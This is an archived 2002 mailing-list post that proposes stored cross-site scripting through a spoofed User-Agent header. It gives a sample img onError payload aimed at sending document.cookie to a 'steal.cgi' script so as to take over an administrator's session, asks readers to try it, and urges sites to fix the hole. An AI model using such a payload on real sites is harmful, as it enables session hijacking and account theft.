There used to be alot of discussion about XSS, cross-site scripting where you can insert html into pages that are viewed by many ppl and steal info... most of these sites (e.g. a bulletin board) have been updated to protect this behaviour... however, i've noticed that many do not cover headers.. e.g. HTTP_USER_AGENT may be logged or stored somewhere when you sign-up to website "abc". The administrator, or whoever will check over your account and see your browser type... normally it would contain something like... Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) .. but with a proxy prog (i use proxomitron) you can change it to whatever you like.. for example: <img src="x.jpg" onError="this.src='steal.cgi?document.cookie';"> and if the site logs it, you just got the administrators password:) Now, im yet to come across any sites that this works on because i just thought of it this afternoon but let me know if it works:) in any case, a lot of sites would log/store this kind of information so it should be fixed. _________________________________________________________________ MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
This archive was generated by hypermail 2b30 : Sat May 25 2002 - 10:40:41 PDT